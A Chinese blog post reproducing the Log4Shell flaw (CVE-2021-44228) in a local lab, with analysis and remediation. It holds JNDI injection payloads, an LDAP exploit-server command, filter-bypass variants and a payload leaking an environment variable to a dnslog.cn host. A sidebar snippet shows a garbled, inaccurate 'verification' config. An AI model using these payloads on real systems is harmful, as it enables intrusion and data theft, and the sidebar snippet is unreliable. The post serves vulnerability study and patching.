log4j2 rce (CVE-2021-44228)

最新推荐文章于 2024-04-06 17:40:56 发布
最新推荐文章于 2024-04-06 17:40:56 发布
阅读量778 收藏 24
点赞数 17
分类专栏: 漏洞复现 文章标签: 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40151476/article/details/136401887
版权

介绍

Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。

由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。漏洞利用无需特殊配置,经阿里云安全团队验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。

此次漏洞触发条件为只要外部用户输入的数据会被日志记录,即可造成远程代码执行。(CNVD-2021-95914、CVE-2021-44228)

影响版本

Apache Log4j 2.x <= 2.15.0-rc1

2.15.0-rc1 存在补丁绕过,但是很鸡肋

复现

Java版本是:8u20

首先新建一个maven项目,pom如下:api不是必需的

        <!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core -->
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
            <version>2.14.1</version>
        </dependency>
        <!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-api -->
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
            <version>2.14.1</version>
        </dependency>

代码如下:

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;


public class Test {
    private static final Logger logger = LogManager.getLogger(Test.class);

    public static void main(String[] args) {
//        logger.error("${jndi:ldap://${env:LOGNAME}.rkk7jq.dnslog.cn}");
        logger.error("${jndi:ldap://127.0.0.1:1389/aaa}");
    }
}

启动Ldap服务器

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:8000/#Exploit

在这里插入图片描述

在exp目录下启动http服务
在这里插入图片描述

结果如下:
在这里插入图片描述

漏洞原理

我们知道执行命令是在Runtime.getRuntime().exec(),我们直接在exec方法下断点,得到调用栈
在这里插入图片描述

调用栈如下:

exec:485, Runtime (java.lang)
<init>:-1, ExploitgJlWqLWBF3
newInstance0:-1, NativeConstructorAccessorImpl (sun.reflect)
newInstance:62, NativeConstructorAccessorImpl (sun.reflect)
newInstance:45, DelegatingConstructorAccessorImpl (sun.reflect)
newInstance:423, Constructor (java.lang.reflect)
newInstance:442, Class (java.lang)
getObjectFactoryFromReference:163, NamingManager (javax.naming.spi)
getObjectInstance:189, DirectoryManager (javax.naming.spi)
c_lookup:1085, LdapCtx (com.sun.jndi.ldap)
p_lookup:542, ComponentContext (com.sun.jndi.toolkit.ctx)
lookup:177, PartialCompositeContext (com.sun.jndi.toolkit.ctx)
lookup:205, GenericURLContext (com.sun.jndi.toolkit.url)
lookup:94, ldapURLContext (com.sun.jndi.url.ldap)
lookup:417, InitialContext (javax.naming)
lookup:172, JndiManager (org.apache.logging.log4j.core.net)
lookup:56, JndiLookup (org.apache.logging.log4j.core.lookup)
lookup:221, Interpolator (org.apache.logging.log4j.core.lookup)
resolveVariable:1110, StrSubstitutor (org.apache.logging.log4j.core.lookup)
substitute:1033, StrSubstitutor (org.apache.logging.log4j.core.lookup)
substitute:912, StrSubstitutor (org.apache.logging.log4j.core.lookup)
replace:467, StrSubstitutor (org.apache.logging.log4j.core.lookup)
format:132, MessagePatternConverter (org.apache.logging.log4j.core.pattern)
format:38, PatternFormatter (org.apache.logging.log4j.core.pattern)
toSerializable:344, PatternLayout$PatternSerializer (org.apache.logging.log4j.core.layout)
toText:244, PatternLayout (org.apache.logging.log4j.core.layout)
encode:229, PatternLayout (org.apache.logging.log4j.core.layout)
encode:59, PatternLayout (org.apache.logging.log4j.core.layout)
directEncodeEvent:197, AbstractOutputStreamAppender (org.apache.logging.log4j.core.appender)
tryAppend:190, AbstractOutputStreamAppender (org.apache.logging.log4j.core.appender)
append:181, AbstractOutputStreamAppender (org.apache.logging.log4j.core.appender)
tryCallAppender:156, AppenderControl (org.apache.logging.log4j.core.config)
callAppender0:129, AppenderControl (org.apache.logging.log4j.core.config)
callAppenderPreventRecursion:120, AppenderControl (org.apache.logging.log4j.core.config)
callAppender:84, AppenderControl (org.apache.logging.log4j.core.config)
callAppenders:540, LoggerConfig (org.apache.logging.log4j.core.config)
processLogEvent:498, LoggerConfig (org.apache.logging.log4j.core.config)
log:481, LoggerConfig (org.apache.logging.log4j.core.config)
log:456, LoggerConfig (org.apache.logging.log4j.core.config)
log:63, DefaultReliabilityStrategy (org.apache.logging.log4j.core.config)
log:161, Logger (org.apache.logging.log4j.core)
tryLogMessage:2205, AbstractLogger (org.apache.logging.log4j.spi)
logMessageTrackRecursion:2159, AbstractLogger (org.apache.logging.log4j.spi)
logMessageSafely:2142, AbstractLogger (org.apache.logging.log4j.spi)
logMessage:2017, AbstractLogger (org.apache.logging.log4j.spi)
logIfEnabled:1983, AbstractLogger (org.apache.logging.log4j.spi)
error:740, AbstractLogger (org.apache.logging.log4j.spi)
main:9, Test

看到lookup()方法,先点过去

在这里插入图片描述

就是常规的jndi注入。

具体调用流程可以看这篇博客。

log4j2 RCE 分析 – 天下大木头 (wjlshare.com)

而log4j处理日志字符串的流程大概是这样的:

总结一下整个分析过程,也很简单

  1. 先判断内容中是否有${},然后截取${}中的内容,得到我们的恶意payload jndi:xxx
  2. 后使用:分割payload,通过前缀来判断使用何种解析器去lookup
  3. 支持的前缀包括date, java, marker, ctx, lower, upper, jndi, main, jvmrunargs, sys, env, log4j

在这里有一点要注意:

*此次漏洞触发条件为只要外部用户输入的数据会被日志记录,即可造成远程代码执行。

那么什么情况下会记录呢?

其实log4j在默认情况下等级是fatal和error才可以记录,其他日志等级也不是不能触发,修改一下日志记录等级,让它能够记录下来我们输入的payload,就可以触发漏洞了。

常规绕过

情况1-多个${}

先来分析一下多个${}的执行流程,Payload举例如下:

${aaa:${bbb:ccc}dd}${ee:ff}

简而言之,如果是KaTeX parse error: Expected '}', got 'EOF' at end of input: {{}}这种类型的,会先处理内部的;如果是 {} {}类型的,会依次处理。

情况2-分割符

payload1: ${aa:\\-bb}

就是把:\- 中的 \ 去掉了变成了:-

payload2:${aa:-bb}

从源码可以看出来,被:-分割成了前后两部分,前面的部分赋值给varName,后面部分赋值给varDefaultValue

  • varName会被传入到resolveVariable()进行解析,如果没有协议什么的,就会返回null
  • 如果resolveVariable()返回值为nullvarDefaultValue在后续的过程中也会递归调用substitute,最后会返回varDefaultValue的值。

简单来说就是看看aa是不是协议,如果不是协议就返回null,如果aa返回null的话,返回bb的值。

那么具体有哪些协议呢?

解析协议说明
date:日期时间(详情org.apache.logging.log4j.core.lookup.DateLookup#lookup
java:一些JVM的信息(可用参数version、runtime、vm、os、hw、locale,详情org.apache.logging.log4j.core.lookup.JavaLookup#lookup
marker:返回event.getMarker(),不知道具体干啥的
ctx:key返回event.getContextData().getValue(key),就是获取上下文的数据
lower:KEY返回字符串小写值
upper:key返回字符串大写值
jndi:JNDI注入利用点,不多说了
main:key返回((MapMessage) event.getMessage()).get(key),也是获取一些变量值
jvmrunargs:没搞懂。。。
sys:key返回一些系统属性:System.getProperty(key)
env:key返回System.getenv(key)
log4j:key返回一些log4j的配置信息,可用值configLocation、configParentLocation

绕过思路

现在知道了${}的执行流程,也知道了分割符的处理流程,那么怎么改造payload呢?

原始payload如下:

${jndi:ldap://127.0.0.1:1389/ccc}

改造后如下:

${${a:-j}ndi:ldap://127.0.0.1:1389/aaa}
${${a:-j}n${::-d}i:ldap://127.0.0.1:1389/aaa}
${${lower:jn}di:ldap://127.0.0.1:1389/aaa}
${${lower:${upper:jn}}di:ldap://127.0.0.1:1389/aaa}
${${lower:${upper:jn}}${::-di}:ldap://127.0.0.1:1389/aaa}

技巧

结合解析协议,我们可以用协议读取一些环境变量

payload:

${jndi:ldap://${env:LOGNAME}.eynz6t.dnslog.cn}

在这里插入图片描述

但是在这里我没有在dns记录里面成功看到,不知带为啥,调试之后是成功了的

修复建议

  1. 升级Apache Log4j2所有相关应用到最新的 log4j-2.15.0-rc2 版本
  2. 升级JDK版本,建议JDK使用11.0.1、8u191、7u201、6u211及以上的高版本,从根源上杜绝大部分常规的JNDI注入

临时措施

  1. 在jvm参数中添加 -Dlog4j2.formatMsgNoLookups=true 【针对 2.10.0 及以上的版本】
  2. 系统环境变量中将FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS设置为true 【针对 2.10.0 及以上的版本】
  3. 创建log4j2.component.properties文件,文件中增加配置log4j2.formatMsgNoLookups=true【针对 2.10.0 及以上的版本】
  4. 限制受影响应用对外访问互联网

参考

06.log4j2_rce分析 · d4m1ts 知识库 (gm7.org)

https://drun1baby.github.io/2022/08/09/Log4j2%E5%A4%8D%E7%8E%B0/

c2Ns
关注
  • 17
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CVE-2021-22986:CVE-2021-22986和F5 BIG-IP RCE
03-25
外伤的影响 此漏洞允许未经身份验证的攻击者通过BIG-IP管理界面和自身IP地址对iControl REST接口进行网络访问,以执行任意系统命令,创建或删除文件以及禁用服务。 此漏洞只能通过控制平面利用,而不能通过数据平面利用。 剥削可能导致完全的系统危害。 设备模式下的BIG-IP系统也容易受到攻击。 外伤产品 F5 BIG-IQ 6.0.0-6.1.0 F5 BIG-IQ 7.0.0-7.0.0.1 F5 BIG-IQ 7.1.0-7.1.0.2 F5 BIG-IP 12.1.0-12.1.5.2 F5 BIG-IP 13.1.0-13.1.3.5 F5 BIG-IP 14.1.0-14.1.3.1 F5 BIG-IP 15.1.0-15.1.2 F5大IP 16.0.0-16.0.1 Vunl Check 基本用法 python3 CVE_2021_22986.py
Log4j2远程代码执行漏洞(CVE-2021-44228
wangzhifei1的博客
01-16 1397
CVE-2021-44228,被广泛称为“Log4Shell”,是一个高危的远程代码执行漏洞,影响了Apache Log4j 2,这是一个在Java应用程序中广泛使用的日志记录库。
Apache Log4j2 Jndi RCE CVE-2021-44228漏洞原理讲解
最新发布
m0_62670778的博客
04-06 1211
Log4j2(Log for java)是Apache软件基金会下一个优秀的java程序日志监控组件Log4j2远程代码执行漏洞细节被公开【影响版本Log4j 2.x
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972 工作于 VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark: 对于vCenter6.7 U2 + vCenter 6.7U2 +在内存中运行网站,因此此Exp不适用于6.7 u2 +。 需要测试 vCenter 6.5 Linux(VCSA)/窗口等待测试 vCenter 6.7 Linux(VCSA)/窗口等待测试 vCenter 7.0 Linux(VCSA)/窗口等待测试 细节 突破为任意文件上传 存在问题的接口为/ui/vropspluginui/rest/services/uploadova ,完整路径( https://domain.com/ui/vropspluginui/r
laravel-CVE-2021-3129-EXP-main.zip 写shellexp
12-17
CVE-2021-3129-EXP 自动写shell的exp
VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972:VMware vCenter未授权RCECVE-2021-21972)
03-04
VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972 zoomeye dork:app:“ VMware vCenter” 使用pocsuite3编写的无害检测 ,使用近一年的数据进行探测: 成功率大约:1551/3998 = 39%
Log4j2漏洞复现(CVE-2021-44228
热门推荐
qq_43798640的博客
12-15 3万+
Apache Log4j是一个基于Java的日志记录组件,通过重写Log4j引入了丰富的功能特性,该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息。Apache Log4j2存在远程代码执行漏洞,攻击者可利用该漏洞向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。影响范围:Apache Log4j 2.x<=2.14.1。已知受影响的应用及组件,如 spring-boot-strater-log4...
Log4j 2漏洞(CVE-2021-44228)的快速响应
dotNET跨平台
12-14 1313
简介2021 年 12 月 9 日,在Log4j的 GitHub 上公开披露了一个影响多个版本的 Apache Log4j 2 实用程序的高严重性漏洞 CVE-2021-44228、CVS...
CVE-2021-44228 Apache Log4j 2 远程代码执行漏洞(反弹shell)
PolarPeak的博客
12-10 5259
本地复现 https://github.com/tangxiaofeng7/apache-log4j-poc log4j.java内容 import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; public class log4j { private static final Logger logger = LogManager.getLogger(log4j.class);
Apache Log4j2代码执行漏洞复现(cve-2021-44228
Bird&Bird
12-14 9240
目录一、漏洞描述二、影响范围三、漏洞复现1、创建一个maven项目,并导入log4j的依赖包2、编写POC3、编写恶意类4、起http服务5、编译并开启LDAP服务6、运行POC四、反弹shell1、靶场搭建2、访问漏洞环境,环境部署成功3、起RMI和Ldap服务4、开启nc监听5、火狐浏览器进行验证6、反弹shell成功 一、漏洞描述 log4j是Apache的一个开源项目,是一个基于Java的日志记录框架。Log4j2是log4j的后继者,被大量用于业务系统开发,记录日志信息。很多互联网公司以及耳熟能详
刚刚公布的 Log4J 的史诗级安全漏洞 CVE-2021-44228 你处理了吗?
weixin_45987961的博客
12-15 5224
发生什么事了 Log4J 是一个应用非常广泛的Java库,就在前两天的2021年12月10日,Log4J的一个安全漏洞被公布了。那天正好是周五,很多程序员都在计划着怎么度过一个愉快的周末,不料这个安全漏洞的公开,使得全世界很多程序员不得不周末加班,有的甚至通宵达旦紧急应对。 漏洞编号为CVE-2021-44228 ,攻击者利用这个新的零日漏洞,可以远程执行恶意代码。 零日漏洞( zero-day )通常是指还没有补丁的安全漏洞。零日漏洞利用(zero-day exploit)的程序对网络安全具有..
Mybb-XSS_SQL_RCE-POC:Mybb将CVE-2021-27890和CVE-2021-27889关联到RCE POC
03-25
Mybb-XSS_SQL_RCE-POC Mybb将CVE-2021-27890和CVE-2021-27889关联到RCE POC 使用前: 这里有两个文件:1.js和Attack_listen.py 您应该修改这两个文件: 1.js: 修改mybb论坛网址和攻击网址: var bashurl = 'http://192.168.92.164/mybb/mybb-mybb_1825' # mybb forum url var attack_url = 'http://192.168.92.165:8080/attack_success' # change the attack machine ip . should keep the same with the attack_listen . py Attack_listen.py 修改攻击主机和攻击端口: attack
大华智慧园区综合管理平台存在未授权高危漏洞(0Day)及以往漏洞POC合集
02-27
大华智慧园区综合管理平台存在未授权高危漏洞(0Day)及以往漏洞POC合集
REALITY_SMASHER:vRealize RCE + Privesc(CVE-2021-21975,CVE-2021-21983,CVE-0DAY-?????)
04-07
REALITY_SMASHER vRealize RCE + Privesc(CVE-2021-21975,CVE-2021-21983,CVE-0DAY-?????) “要理解就容易停止。” 它是什么? 除了在测试期间发现的特权提升漏洞外,“ Reality Smasher”是vRealize的一种利用,它利用了 (CVE-2021-21975,CVE-2021-21983)中解决的安全问题。 它是如何工作的? “ Reality Smasher”利用CVE-2021-21975窃取vRealize的“ maintenanceAdmin”帐户的凭据。 这是通过使用此存储库中包含的密钥和证书托管HTTPS侦听器来实现的。 这些凭据将在所有后续身份验证请求中使用。 首先,请求并存储管理员帐户的哈希密码,以供以后使用。 接下来,发出启用SSH服务的请求。 接下来,使用CVE-2021
CVE-2021-26855 Exchange RCE.MD
04-23
CVE-2021-26855 Exchange RCE
CVE-2021-21972-vCenter-6.5-7.0-RCE-POC
03-04
CVE-2021-21972-vCenter-6.5-7.0-RCE-POC poc只需验证某人的路径的返回状态 POC仅用于测试,未添加EXP模块 POC仅用于测试,未加入exp模块
CVE-2021-22192:CVE-2021-22192靶场:未授权用户RCE漏洞
03-30
CVE-2021-22192 CVE-2021-22192靶场:未授权用户RCE漏洞0x10靶场环境0x20目录结构CVE-2021-22192├── README.md ............... [此 README 说明]├── imgs .................... [辅助 README 说明的图片]├─...
CVE-2021-34473 Exchange RCE.MD
04-23
CVE-2021-34473 Exchange RCE
CVE-2021-44228 Apache Log4j2 远程代码执行漏洞复现
热爱学习,喜欢折腾!
09-03 4137
Apache Log4j2 是 Apache 软件基金会下的一个开源的基于 Java 的日志记录工具。Log4j2 是一个 Log4j 1.x 的重写,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。由于其优异的性能而被广泛的应用于各种常见的 Web 服务中。apache log4j通过定义每一条日志信息的级别能够更加细致地控制日志生成地过程,受影响地版本中纯在JNDI注入漏洞,导致日志在记录用户输入地数据时,触发了注入漏洞,该漏洞可导致远程代码执行,且利用条件低,影响范围广。
Apache Log4j2 Remote Code Execution (CVE-2021-44228)如何验证
06-06
Apache Log4j2 远程代码执行漏洞(CVE-2021-44228)可以通过以下步骤进行验证: 1. 构造一个恶意的日志信息,包含以下内容: ``` <appender name="RCE" class="org.apache.log4j.ConsoleAppender"> <param name="Target" value="System.out"/> <param name="immediateFlush" value="true"/> <layout class="org.apache.logging.log4j.core.layout.PatternLayout"> <param name="ConversionPattern" value="%d{yyyy-MM-dd HH:mm:ss.SSS} [%t] %-5level %logger{36}:%line - %msg%n"/> </layout> <filter class="org.apache.logging.log4j.core.filter.AbstractFilterable"> <filter class="org.apache.logging.log4j.core.filter.GroovyFilter"> <param name="script" value="new java.lang.ProcessBuilder(['calc']).start()"/> </filter> </filter> </appender> <root level="info"> <appender-ref ref="RCE"/> </root> ``` 2. 将恶意日志信息发送到漏洞受影响的 Log4j2 服务端,例如通过网络或者文件系统等方式。 3. 如果服务端受到影响,则会执行恶意脚本,例如在 Windows 上弹出计算器。 请注意,验证漏洞时需要遵守法律法规和道德准则,不得对未授权的系统进行测试。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值